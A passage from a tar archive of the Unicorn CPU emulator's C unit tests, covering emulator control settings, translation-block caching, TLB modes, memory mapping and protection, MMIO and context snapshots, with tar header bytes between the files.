{"test_arm64_mmu", test_arm64_mmu}, {"test_arm64_pc_wrap", test_arm64_pc_wrap}, {NULL, NULL}}; �����������������������unicorn-2.1.1/tests/unit/test_ctl.c�����������������������������������������������������������������0000664�0000000�0000000�00000027733�14675241067�0017326�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" #include <time.h> #include <string.h> // We have to copy this for Android. #ifdef _WIN32 #include "windows.h" #define NANOSECONDS_PER_SECOND 1000000000LL static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) { union { uint64_t ll; struct { uint32_t low, high; } l; } u, res; uint64_t rl, rh; u.ll = a; rl = (uint64_t)u.l.low * (uint64_t)b; rh = (uint64_t)u.l.high * (uint64_t)b; rh += (rl >> 32); res.l.high = rh / c; res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; return res.ll; } static int64_t get_freq(void) { LARGE_INTEGER freq; int ret = QueryPerformanceFrequency(&freq); if (ret == 0) { fprintf(stderr, "Could not calibrate ticks\n"); exit(1); } return freq.QuadPart; } static inline int64_t get_clock_realtime(void) { LARGE_INTEGER ti; QueryPerformanceCounter(&ti); return muldiv64(ti.QuadPart, NANOSECONDS_PER_SECOND, get_freq()); } #else #include <sys/time.h> #include "sys/mman.h" /* get host real time in nanosecond */ static inline int64_t get_clock_realtime(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); } #endif const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } #define GEN_SIMPLE_READ_TEST(field, ctl_type, arg_type, expected) \ static void test_uc_ctl_##field(void) \ { \ uc_engine *uc; \ arg_type arg; \ OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); \ OK(uc_ctl(uc, UC_CTL_READ(ctl_type, 1), &arg)); \ TEST_CHECK(arg == expected); \ OK(uc_close(uc)); \ } GEN_SIMPLE_READ_TEST(mode, UC_CTL_UC_MODE, int, 4) GEN_SIMPLE_READ_TEST(arch, UC_CTL_UC_ARCH, int, 4) GEN_SIMPLE_READ_TEST(page_size, UC_CTL_UC_PAGE_SIZE, uint32_t, 4096) GEN_SIMPLE_READ_TEST(time_out, UC_CTL_UC_TIMEOUT, uint64_t, 0) static void test_uc_ctl_exits(void) { uc_engine *uc; // cmp eax, 0; // jg lb; // inc eax; // nop; <---- exit1 // lb: // inc ebx; // nop; <---- exit2 char code[] = "\x83\xf8\x00\x7f\x02\x40\x90\x43\x90"; int r_eax; int r_ebx; uint64_t exits[] = {code_start + 6, code_start + 8}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_ctl_exits_enable(uc)); OK(uc_ctl_set_exits(uc, exits, 2)); r_eax = 0; r_ebx = 0; OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx)); // Run two times. OK(uc_emu_start(uc, code_start, 0, 0, 0)); OK(uc_emu_start(uc, code_start, 0, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx)); TEST_CHECK(r_eax == 1); TEST_CHECK(r_ebx == 1); OK(uc_close(uc)); } double time_emulation(uc_engine *uc, uint64_t start, uint64_t end) { int64_t t1, t2; t1 = get_clock_realtime(); OK(uc_emu_start(uc, start, end, 0, 0)); t2 = get_clock_realtime(); return t2 - t1; } #define TB_COUNT (8) #define TCG_MAX_INSNS (512) // from tcg.h #define CODE_LEN TB_COUNT *TCG_MAX_INSNS static void test_uc_ctl_tb_cache(void) { uc_engine *uc; char code[CODE_LEN + 1]; double standard, cached, evicted; memset(code, 0x90, CODE_LEN); code[CODE_LEN] = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); standard = time_emulation(uc, code_start, code_start + sizeof(code) - 1); for (int i = 0; i < TB_COUNT; i++) { OK(uc_ctl_request_cache(uc, code_start + i * TCG_MAX_INSNS, NULL)); } cached = time_emulation(uc, code_start, code_start + sizeof(code) - 1); for (int i = 0; i < TB_COUNT; i++) { OK(uc_ctl_remove_cache(uc, code_start + i * TCG_MAX_INSNS, code_start + i * TCG_MAX_INSNS + 1)); } evicted = time_emulation(uc, code_start, code_start + sizeof(code) - 1); // In fact, evicted is also slightly faster than standard but we don't do // this guarantee. TEST_CHECK(cached < standard); TEST_CHECK(evicted > cached); OK(uc_close(uc)); } // Test requires UC_ARCH_ARM. #ifdef UNICORN_HAS_ARM static void test_uc_ctl_change_page_size(void) { uc_engine *uc; uc_engine *uc2; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc2)); OK(uc_ctl_set_page_size(uc, 4096)); OK(uc_mem_map(uc2, 1 << 10, 1 << 10, UC_PROT_ALL)); uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, 1 << 10, 1 << 10, UC_PROT_ALL)); OK(uc_close(uc)); OK(uc_close(uc2)); } #endif // Test requires UC_ARCH_ARM. #ifdef UNICORN_HAS_ARM // Copy from test_arm.c but with new API. static void test_uc_ctl_arm_cpu(void) { uc_engine *uc; int r_control, r_msp, r_psp; OK(uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_M7)); r_control = 0; // Make sure we are using MSP. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); r_msp = 0x1000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_msp)); r_control = 0b10; // Make the switch. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_psp)); TEST_CHECK(r_psp != r_msp); r_psp = 0x2000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_psp)); r_control = 0; // Switch again OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_msp)); TEST_CHECK(r_psp != r_msp); TEST_CHECK(r_msp == 0x1000); OK(uc_close(uc)); } #endif static void test_uc_hook_cached_cb(uc_engine *uc, uint64_t addr, size_t size, void *user_data) { // Don't add any TEST_CHECK here since we can't refer to the global variable // here. uint64_t *p = (uint64_t *)user_data; (*p)++; return; } static void test_uc_hook_cached_uaf(void) { uc_engine *uc; // "INC ecx; DEC edx; jmp t; t: nop" char code[] = "\x41\x4a\xeb\x00\x90"; uc_hook h; uint64_t count = 0; #ifndef _WIN32 // Apple Silicon does not allow RWX pages. void *callback = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); TEST_CHECK(callback != (void *)-1); #else void *callback = VirtualAlloc(NULL, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); TEST_CHECK(callback != NULL); #endif memcpy(callback, (void *)test_uc_hook_cached_cb, 4096); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_EXEC) == 0); #endif uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, (void *)callback, (void *)&count, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // Move the hook to the deleted hooks list. OK(uc_hook_del(uc, h)); // This will clear deleted hooks and SHOULD clear cache. OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_WRITE) == 0); #endif memset(callback, 0, 4096); #ifndef _WIN32 TEST_CHECK(mprotect(callback, 4096, PROT_READ | PROT_EXEC) == 0); #endif // Now hooks are deleted and thus this will trigger a UAF OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(count == 4); OK(uc_close(uc)); #ifndef _WIN32 munmap(callback, 4096); #else VirtualFree(callback, 0, MEM_RELEASE); #endif } static void test_uc_emu_stop_set_ip_callback(uc_engine *uc, uint64_t address, uint32_t size, void *userdata) { uint64_t rip = code_start + 0xb; if (address == code_start + 0x7) { uc_emu_stop(uc); uc_reg_write(uc, UC_X86_REG_RIP, &rip); } } static void test_uc_emu_stop_set_ip(void) { uc_engine *uc; uc_hook h; uint64_t rip; char code[] = "\x48\x31\xc0" // 0x0 xor rax, rax : rax = 0 "\x90" // 0x3 nop : "\x48\xff\xc0" // 0x4 inc rax : rax++ "\x90" // 0x7 nop : <-- going to stop here "\x48\xff\xc0" // 0x8 inc rax : rax++ "\x90" // 0xb nop : "\x0f\x0b" // 0xc ud2 : <-- will raise // UC_ERR_INSN_INVALID, but should not never be reached "\x90" // 0xe nop : "\x90"; // 0xf nop : uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_uc_emu_stop_set_ip_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &rip)); TEST_CHECK(rip == code_start + 0xb); OK(uc_close(uc)); } static bool test_tlb_clear_tlb(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { size_t *tlbcount = (size_t *)user_data; *tlbcount += 1; result->paddr = addr; result->perms = UC_PROT_ALL; return true; } static void test_tlb_clear_syscall(uc_engine *uc, void *user_data) { OK(uc_ctl_flush_tlb(uc)); } static void test_tlb_clear(void) { uc_engine *uc; uc_hook hook1, hook2; size_t tlbcount = 0; char code[] = "\xa3\x00\x00\x20\x00\x00\x00\x00\x00\x0f\x05\xa3\x00\x00\x20\x00\x00" "\x00\x00\x00"; // movabs dword ptr [0x200000], eax; syscall; movabs // dword ptr [0x200000], eax uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x200000, 0x1000, UC_PROT_ALL)); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook1, UC_HOOK_TLB_FILL, test_tlb_clear_tlb, &tlbcount, 1, 0)); OK(uc_hook_add(uc, &hook2, UC_HOOK_INSN, test_tlb_clear_syscall, NULL, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(tlbcount == 4); OK(uc_close(uc)); } static void test_noexec(void) { uc_engine *uc; /* mov al, byte ptr[rip] * nop */ char code[] = "\x8a\x05\x00\x00\x00\x00\x90"; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_mem_protect(uc, code_start, code_start + 0x1000, UC_PROT_EXEC)); uc_assert_err( UC_ERR_READ_PROT, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_uc_ctl_mode", test_uc_ctl_mode}, {"test_uc_ctl_page_size", test_uc_ctl_page_size}, {"test_uc_ctl_arch", test_uc_ctl_arch}, {"test_uc_ctl_time_out", test_uc_ctl_time_out}, {"test_uc_ctl_exits", test_uc_ctl_exits}, {"test_uc_ctl_tb_cache", test_uc_ctl_tb_cache}, #ifdef UNICORN_HAS_ARM {"test_uc_ctl_change_page_size", test_uc_ctl_change_page_size}, {"test_uc_ctl_arm_cpu", test_uc_ctl_arm_cpu}, #endif {"test_uc_hook_cached_uaf", test_uc_hook_cached_uaf}, {"test_uc_emu_stop_set_ip", test_uc_emu_stop_set_ip}, {"test_tlb_clear", test_tlb_clear}, {"test_noexec", test_noexec}, {NULL, NULL}}; �������������������������������������unicorn-2.1.1/tests/unit/test_m68k.c����������������������������������������������������������������0000664�0000000�0000000�00000001777�14675241067�0017331�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_m68k cpu_model) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu_model)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_move_to_sr(void) { uc_engine *uc; char code[] = "\x46\xfc\x27\x00"; // move #$2700,sr int r_sr; uc_common_setup(&uc, UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_M68K_M68000); OK(uc_reg_read(uc, UC_M68K_REG_SR, &r_sr)); r_sr = r_sr | 0x2000; OK(uc_reg_write(uc, UC_M68K_REG_SR, &r_sr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_move_to_sr", test_move_to_sr}, {NULL, NULL}};�unicorn-2.1.1/tests/unit/test_mem.c�����������������������������������������������������������������0000664�0000000�0000000�00000034362�14675241067�0017316�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" static void test_map_correct(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x40000, 0x1000 * 16, UC_PROT_ALL)); // [0x40000, 0x50000] OK(uc_mem_map(uc, 0x60000, 0x1000 * 16, UC_PROT_ALL)); // [0x60000, 0x70000] OK(uc_mem_map(uc, 0x20000, 0x1000 * 16, UC_PROT_ALL)); // [0x20000, 0x30000] uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x10000, 0x2000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x25000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x35000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x45000, 0x1000 * 16, UC_PROT_ALL)); uc_assert_err(UC_ERR_MAP, uc_mem_map(uc, 0x55000, 0x2000 * 16, UC_PROT_ALL)); OK(uc_mem_map(uc, 0x35000, 0x5000, UC_PROT_ALL)); OK(uc_mem_map(uc, 0x50000, 0x5000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_map_wrapping(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, (~0ll - 0x4000) & ~0xfff, 0x8000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_mem_protect(void) { uc_engine *qc; int r_eax = 0x2000; int r_esi = 0xdeadbeef; uint32_t mem; // add [eax + 4], esi char code[] = {0x01, 0x70, 0x04}; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &qc)); OK(uc_reg_write(qc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(qc, UC_X86_REG_ESI, &r_esi)); OK(uc_mem_map(qc, 0x1000, 0x1000, UC_PROT_READ | UC_PROT_EXEC)); OK(uc_mem_map(qc, 0x2000, 0x1000, UC_PROT_READ)); OK(uc_mem_protect(qc, 0x2000, 0x1000, UC_PROT_READ | UC_PROT_WRITE)); OK(uc_mem_write(qc, 0x1000, code, sizeof(code))); OK(uc_emu_start(qc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 1)); OK(uc_mem_read(qc, 0x2000 + 4, &mem, 4)); TEST_CHECK(LEINT32(mem) == 0xdeadbeef); OK(uc_close(qc)); } static void test_splitting_mem_unmap(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0x20000, 0x1000, UC_PROT_NONE)); OK(uc_mem_map(uc, 0x21000, 0x2000, UC_PROT_NONE)); OK(uc_mem_unmap(uc, 0x21000, 0x1000)); OK(uc_close(uc)); } static uint64_t test_splitting_mmio_unmap_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); return 0x19260817; } static void test_splitting_mmio_unmap(void) { uc_engine *uc; // mov ecx, [0x3004] <-- normal read // mov ebx, [0x4004] <-- mmio read char code[] = "\x8b\x0d\x04\x30\x00\x00\x8b\x1d\x04\x40\x00\x00"; int r_ecx, r_ebx; int bytes = LEINT32(0xdeadbeef); OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mmio_map(uc, 0x3000, 0x2000, test_splitting_mmio_unmap_read_callback, NULL, NULL, NULL)); // Map a ram area instead OK(uc_mem_unmap(uc, 0x3000, 0x1000)); OK(uc_mem_map(uc, 0x3000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x3004, &bytes, 4)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &r_ebx)); TEST_CHECK(r_ecx == 0xdeadbeef); TEST_CHECK(r_ebx == 0x19260817); OK(uc_close(uc)); } static void test_mem_protect_map_ptr(void) { uc_engine *uc; uint64_t val = 0x114514; uint8_t *data1 = NULL; uint8_t *data2 = NULL; uint64_t mem; data1 = calloc(sizeof(*data1), 0x4000); data2 = calloc(sizeof(*data2), 0x2000); OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map_ptr(uc, 0x4000, 0x4000, UC_PROT_ALL, data1)); OK(uc_mem_unmap(uc, 0x6000, 0x2000)); OK(uc_mem_map_ptr(uc, 0x6000, 0x2000, UC_PROT_ALL, data2)); OK(uc_mem_write(uc, 0x6004, &val, 8)); OK(uc_mem_protect(uc, 0x6000, 0x1000, UC_PROT_READ)); OK(uc_mem_read(uc, 0x6004, (void *)&mem, 8)); TEST_CHECK(val == mem); OK(uc_close(uc)); free(data2); free(data1); } static void test_map_at_the_end(void) { uc_engine *uc; uint8_t mem[0x1000]; memset(mem, 0xff, 0x100); OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0xfffffffffffff000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0xfffffffffffff000, mem, sizeof(mem))); uc_assert_err(UC_ERR_WRITE_UNMAPPED, uc_mem_write(uc, 0xffffffffffffff00, mem, sizeof(mem))); uc_assert_err(UC_ERR_WRITE_UNMAPPED, uc_mem_write(uc, 0, mem, sizeof(mem))); OK(uc_close(uc)); } static void test_map_wrap(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); uc_assert_err(UC_ERR_ARG, uc_mem_map(uc, 0xfffffffffffff000, 0x2000, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_map_big_memory(void) { uc_engine *uc; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); #if defined(_WIN32) || defined(__WIN32__) || defined(__WINDOWS__) uint64_t requested_size = 0xfffffffffffff000; // assume 4K page size #else long ps = sysconf(_SC_PAGESIZE); uint64_t requested_size = (uint64_t)(-ps); #endif uc_assert_err(UC_ERR_NOMEM, uc_mem_map(uc, 0x0, requested_size, UC_PROT_ALL)); OK(uc_close(uc)); } static void test_mem_protect_remove_exec_callback(uc_engine *uc, uint64_t addr, size_t size, void *data) { uint64_t *p = (uint64_t *)data; (*p)++; OK(uc_mem_protect(uc, 0x2000, 0x1000, UC_PROT_READ)); } static void test_mem_protect_remove_exec(void) { uc_engine *uc; char code[] = "\x90\xeb\x00\x90"; uc_hook hk; uint64_t called_count = 0; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_hook_add(uc, &hk, UC_HOOK_BLOCK, test_mem_protect_remove_exec_callback, (void *)&called_count, 1, 0)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); TEST_CHECK(called_count == 2); OK(uc_close(uc)); } static uint64_t test_mem_protect_mmio_read_cb(struct uc_struct *uc, uint64_t addr, unsigned size, void *user_data) { TEST_CHECK(addr == 0x20); // note, it's not 0x1020 *(uint64_t *)user_data = *(uint64_t *)user_data + 1; return 0x114514; } static void test_mem_protect_mmio_write_cb(struct uc_struct *uc, uint64_t addr, unsigned size, uint64_t data, void *user_data) { TEST_CHECK(false); return; } static void test_mem_protect_mmio(void) { uc_engine *uc; // mov eax, [0x2020]; mov [0x2020], eax char code[] = "\xa1\x20\x20\x00\x00\x00\x00\x00\x00\xa3\x20\x20\x00\x00\x00" "\x00\x00\x00"; uint64_t called = 0; uint64_t r_eax; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0x8000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x8000, code, sizeof(code) - 1)); OK(uc_mmio_map(uc, 0x1000, 0x3000, test_mem_protect_mmio_read_cb, (void *)&called, test_mem_protect_mmio_write_cb, (void *)&called)); OK(uc_mem_protect(uc, 0x2000, 0x1000, UC_PROT_READ)); uc_assert_err(UC_ERR_WRITE_PROT, uc_emu_start(uc, 0x8000, 0x8000 + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_eax)); TEST_CHECK(called == 1); TEST_CHECK(r_eax == 0x114514); OK(uc_close(uc)); } static void test_snapshot(void) { uc_engine *uc; uc_context *c0, *c1; uint32_t mem; uint8_t code_data; // mov eax, [0x2020]; inc eax; mov [0x2020], eax char code[] = "\xa1\x20\x20\x00\x00\x00\x00\x00\x00\xff\xc0\xa3\x20\x20\x00" "\x00\x00\x00\x00\x00"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_context_alloc(uc, &c0)); OK(uc_context_alloc(uc, &c1)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); OK(uc_context_save(uc, c0)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_save(uc, c1)); OK(uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 2); OK(uc_context_restore(uc, c1)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_restore(uc, c0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 0); OK(uc_mem_read(uc, 0x1000, &code_data, sizeof(code_data))); TEST_CHECK(code_data == 0xa1); OK(uc_context_free(c0)); OK(uc_context_free(c1)); OK(uc_close(uc)); } static bool test_snapshot_with_vtlb_callback(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { result->paddr = addr - 0x400000000; result->perms = UC_PROT_ALL; return true; } static void test_snapshot_with_vtlb(void) { uc_engine *uc; uc_context *c0, *c1; uint32_t mem; uc_hook hook; // mov eax, [0x2020]; inc eax; mov [0x2020], eax char code[] = "\xA1\x20\x20\x00\x00\x04\x00\x00\x00\xFF\xC0\xA3\x20\x20\x00" "\x00\x04\x00\x00\x00"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); // Allocate contexts OK(uc_context_alloc(uc, &c0)); OK(uc_context_alloc(uc, &c1)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY)); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_TLB_FILL, test_snapshot_with_vtlb_callback, NULL, 1, 0)); // Map physical memory OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_EXEC | UC_PROT_READ)); OK(uc_mem_write(uc, 0x1000, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); // Initial context save OK(uc_context_save(uc, c0)); OK(uc_emu_start(uc, 0x400000000 + 0x1000, 0x400000000 + 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_save(uc, c1)); OK(uc_emu_start(uc, 0x400000000 + 0x1000, 0x400000000 + 0x1000 + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 2); OK(uc_context_restore(uc, c1)); // TODO check mem OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 1); OK(uc_context_restore(uc, c0)); OK(uc_mem_read(uc, 0x2020, &mem, sizeof(mem))); TEST_CHECK(mem == 0); // TODO check mem OK(uc_context_free(c0)); OK(uc_context_free(c1)); OK(uc_close(uc)); } static void test_context_snapshot(void) { uc_engine *uc; uc_context *ctx; uint64_t baseaddr = 0xfffff1000; uint64_t offset = 0x10; uint64_t tmp = 1; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY | UC_CTL_CONTEXT_CPU)); OK(uc_mem_map(uc, baseaddr, 0x1000, UC_PROT_ALL)); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_mem_write(uc, baseaddr + offset, &tmp, sizeof(tmp))); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 1); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 0); tmp = 2; OK(uc_mem_write(uc, baseaddr + offset, &tmp, sizeof(tmp))); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 2); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, baseaddr + offset, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 0); OK(uc_context_free(ctx)); OK(uc_close(uc)); } static void test_snapshot_unmap(void) { uc_engine *uc; uc_context *ctx; uint64_t tmp; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_context_mode(uc, UC_CTL_CONTEXT_MEMORY | UC_CTL_CONTEXT_CPU)); OK(uc_mem_map(uc, 0x1000, 0x2000, UC_PROT_ALL)); tmp = 1; OK(uc_mem_write(uc, 0x1000, &tmp, sizeof(tmp))); tmp = 2; OK(uc_mem_write(uc, 0x2000, &tmp, sizeof(tmp))); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); uc_assert_err(UC_ERR_ARG, uc_mem_unmap(uc, 0x1000, 0x1000)); OK(uc_mem_unmap(uc, 0x1000, 0x2000)); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_mem_read(uc, 0x1000, &tmp, sizeof(tmp))); uc_assert_err(UC_ERR_READ_UNMAPPED, uc_mem_read(uc, 0x2000, &tmp, sizeof(tmp))); OK(uc_context_restore(uc, ctx)); OK(uc_mem_read(uc, 0x1000, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 1); OK(uc_mem_read(uc, 0x2000, &tmp, sizeof(tmp))); TEST_CHECK(tmp == 2); OK(uc_context_free(ctx)); OK(uc_close(uc)); } TEST_LIST = {{"test_map_correct", test_map_correct}, {"test_map_wrapping", test_map_wrapping}, {"test_mem_protect", test_mem_protect}, {"test_splitting_mem_unmap", test_splitting_mem_unmap}, {"test_splitting_mmio_unmap", test_splitting_mmio_unmap}, {"test_mem_protect_map_ptr", test_mem_protect_map_ptr}, {"test_map_at_the_end", test_map_at_the_end}, {"test_map_wrap", test_map_wrap}, {"test_map_big_memory", test_map_big_memory}, {"test_mem_protect_remove_exec", test_mem_protect_remove_exec}, {"test_mem_protect_mmio", test_mem_protect_mmio}, {"test_snapshot", test_snapshot}, {"test_snapshot_with_vtlb", test_snapshot_with_vtlb}, {"test_context_snapshot", test_context_snapshot}, {"test_snapshot_unmap", test_snapshot_unmap}, {NULL, NULL}}; ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_mips.c����������������������������������������������������������������0000664�0000000�0000000�00000007702�14675241067�0017506�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x10000000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, 